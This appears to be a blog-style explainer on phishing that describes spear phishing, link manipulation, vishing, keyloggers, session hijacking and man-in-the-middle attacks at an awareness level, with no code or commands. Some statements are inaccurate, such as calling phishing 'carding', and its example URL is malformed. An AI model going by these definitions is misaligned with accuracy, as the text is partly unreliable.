In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information. Phishing also known as brand spoofing or carding, is a variation on “fishing,” the idea being that bait is thrown out with the hopes that while most will ignore the bait, some will be tempted into biting. It is also possible to phish for other information in additions to username and passwords such as credit card numbers, bank account numbers, social security numbers. The damage caused by phishing ranges from denial of access to e-mail to substantial financial loss.
The process of sending a phishing email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is fake and are being used only to steal the user’s information. This is one of the examples of phishing. There have been lots of phishing scams happened.
Also Read: Domain Name System
The list of phishing techniques is given as follows:
1. Spear Phishing
Spear-phishing attacks generally come disguised as e-mails that appear to come from trusted sources. They might contain a malicious attachment or a link to a malicious website that the recipient is encouraged to click on to obtain important information about a company matter.
Once a recipient clicks on the link, his browser is directed to a malicious site, where malware is downloaded surreptitiously to his computer. The malware allows an attacker to control the victim’s computer remotely and steal log-in information for banking accounts or for protected internal company systems.
Also Read: Tips to avoid facebook hack
2. Link manipulation
Most methods of phishing use some form of technical deception designed to make a link in an e-mail. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.xyz..com/, it appears as though the URL will take you to the XYZ website; but actually, it does not happen so. Another common trick is to make the displayed text for a link (the text between the <A> tags) suggest a reliable destination when the link actually goes to the phishers’ site.
3. Filter Evasion
It is common for Facebook to send an email to notify their users when another Facebook user adds them as a friend on the social network. However, the spammers included a zip attachment that purports to contain a picture. When the recipient double-clicks on it. The attached Trojan horse file is executed on the user’s machine. Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing e-mails
4. Website Forgery
An another technique of smart phishing. Once a victim recipient visits the phishing website, the deception is not over. An attacker can also cause flaws in a trusted website’s own scripts against the victim. These types of attacks very harmful, because they direct the user to sign in at their bank or service’s own web page, where everything from the web address to the security certificates appears correct. Just such a flaw was used in 2006 against PayPal.
5. Phone Phishing
Also concerned with Vishing (voice phishing). It uses a fake caller-ID data to disguise that calls are from a trusted organization. Sometimes the messages that claimed to be from a bank told users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) was dialed, prompts told users to enter their account numbers and PIN.
There are much more types of phishing. Some of them are briefly defined under the following section.
- Keyloggers and Screenloggers are special types of malware that trace the keyboard input and send relevant information to the hacker via the Internet. They can embed themselves into users’ browsers as small utility programs known as helper objects that run automatically when the browser is started as well as into system files as device drivers or screen monitors. Eg. All the screen shots of the system can be directly sent to their e-mail IDs.
- Session Hijacking defines an attack where users’ activities are monitored until they establish their bona fide credentials. At that point, the malicious software takes over and can undertake unauthorized actions, such as transferring funds, without the user’s knowledge.
- System Reconfiguration Attacks modify settings on a user’s PC for malicious purposes. For example URLs in a favorite file might be modified to direct users to look the same websites.
- Man-in-the-Middle Phishing is harder to detect than many other forms of phishing. In these attacks, hackers position themselves between the user and the legitimate website or system. They record the information being entered but continue to pass it on so that users’ transactions are not affected. Later they can sell or use the information or credentials collected when the user is not active on the system.
- Search Engine Phishing occurs when phishers create websites with attractive sounding offers and have them indexed legitimately with search engines. Users find the sites in the normal course of searching for products or services and are fooled into giving up their information.
There are several different techniques to combat phishing, including legislation and technology created specifically to protect against phishing. Most new internet browsers come with anti-phishing software.